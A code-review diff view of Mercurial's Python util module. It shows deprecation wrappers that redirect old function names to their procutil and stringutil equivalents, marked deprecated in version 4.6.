3823 testpid = _deprecatedfunc(procutil.testpid, '4.6', modname='utils.procutil')
3836 testpid = _deprecatedfunc(procutil.testpid, '4.6', modname='utils.procutil')
3824 try:
3837 try:
3825 setprocname = _deprecatedfunc(procutil.setprocname, '4.6',
3838 setprocname = _deprecatedfunc(procutil.setprocname, '4.6',
3826 modname='utils.procutil')
3839 modname='utils.procutil')
3827 except AttributeError:
3840 except AttributeError:
3828 pass
3841 pass
3829 try:
3842 try:
3830 unblocksignal = _deprecatedfunc(procutil.unblocksignal, '4.6',
3843 unblocksignal = _deprecatedfunc(procutil.unblocksignal, '4.6',
3831 modname='utils.procutil')
3844 modname='utils.procutil')
3832 except AttributeError:
3845 except AttributeError:
3833 pass
3846 pass
3834 closefds = procutil.closefds
3847 closefds = procutil.closefds
3835 isatty = _deprecatedfunc(procutil.isatty, '4.6')
3848 isatty = _deprecatedfunc(procutil.isatty, '4.6')
3836 popen2 = _deprecatedfunc(procutil.popen2, '4.6')
3849 popen2 = _deprecatedfunc(procutil.popen2, '4.6')
3837 popen3 = _deprecatedfunc(procutil.popen3, '4.6')
3850 popen3 = _deprecatedfunc(procutil.popen3, '4.6')
3838 popen4 = _deprecatedfunc(procutil.popen4, '4.6')
3851 popen4 = _deprecatedfunc(procutil.popen4, '4.6')
3839 pipefilter = _deprecatedfunc(procutil.pipefilter, '4.6')
3852 pipefilter = _deprecatedfunc(procutil.pipefilter, '4.6')
3840 tempfilter = _deprecatedfunc(procutil.tempfilter, '4.6')
3853 tempfilter = _deprecatedfunc(procutil.tempfilter, '4.6')
3841 filter = _deprecatedfunc(procutil.filter, '4.6')
3854 filter = _deprecatedfunc(procutil.filter, '4.6')
3842 mainfrozen = _deprecatedfunc(procutil.mainfrozen, '4.6')
3855 mainfrozen = _deprecatedfunc(procutil.mainfrozen, '4.6')
3843 hgexecutable = _deprecatedfunc(procutil.hgexecutable, '4.6')
3856 hgexecutable = _deprecatedfunc(procutil.hgexecutable, '4.6')
3844 isstdin = _deprecatedfunc(procutil.isstdin, '4.6')
3857 isstdin = _deprecatedfunc(procutil.isstdin, '4.6')
3845 isstdout = _deprecatedfunc(procutil.isstdout, '4.6')
3858 isstdout = _deprecatedfunc(procutil.isstdout, '4.6')
3846 shellenviron = _deprecatedfunc(procutil.shellenviron, '4.6')
3859 shellenviron = _deprecatedfunc(procutil.shellenviron, '4.6')
3847 system = _deprecatedfunc(procutil.system, '4.6')
3860 system = _deprecatedfunc(procutil.system, '4.6')
3848 gui = _deprecatedfunc(procutil.gui, '4.6')
3861 gui = _deprecatedfunc(procutil.gui, '4.6')
3849 hgcmd = _deprecatedfunc(procutil.hgcmd, '4.6')
3862 hgcmd = _deprecatedfunc(procutil.hgcmd, '4.6')
3850 rundetached = _deprecatedfunc(procutil.rundetached, '4.6')
3863 rundetached = _deprecatedfunc(procutil.rundetached, '4.6')
3851
3864
3852 binary = _deprecatedfunc(stringutil.binary, '4.6')
3865 binary = _deprecatedfunc(stringutil.binary, '4.6')
3853 stringmatcher = _deprecatedfunc(stringutil.stringmatcher, '4.6')
3866 stringmatcher = _deprecatedfunc(stringutil.stringmatcher, '4.6')
3854 shortuser = _deprecatedfunc(stringutil.shortuser, '4.6')
3867 shortuser = _deprecatedfunc(stringutil.shortuser, '4.6')
3855 emailuser = _deprecatedfunc(stringutil.emailuser, '4.6')
3868 emailuser = _deprecatedfunc(stringutil.emailuser, '4.6')
3856 email = _deprecatedfunc(stringutil.email, '4.6')
3869 email = _deprecatedfunc(stringutil.email, '4.6')
3857 ellipsis = _deprecatedfunc(stringutil.ellipsis, '4.6')
3870 ellipsis = _deprecatedfunc(stringutil.ellipsis, '4.6')
3858 escapestr = _deprecatedfunc(stringutil.escapestr, '4.6')
3871 escapestr = _deprecatedfunc(stringutil.escapestr, '4.6')
3859 unescapestr = _deprecatedfunc(stringutil.unescapestr, '4.6')
3872 unescapestr = _deprecatedfunc(stringutil.unescapestr, '4.6')
3860 forcebytestr = _deprecatedfunc(stringutil.forcebytestr, '4.6')
3873 forcebytestr = _deprecatedfunc(stringutil.forcebytestr, '4.6')
3861 uirepr = _deprecatedfunc(stringutil.uirepr, '4.6')
3874 uirepr = _deprecatedfunc(stringutil.uirepr, '4.6')
3862 wrap = _deprecatedfunc(stringutil.wrap, '4.6')
3875 wrap = _deprecatedfunc(stringutil.wrap, '4.6')
3863 parsebool = _deprecatedfunc(stringutil.parsebool, '4.6')
3876 parsebool = _deprecatedfunc(stringutil.parsebool, '4.6')
General Comments 0
You need to be logged in to leave comments. Login now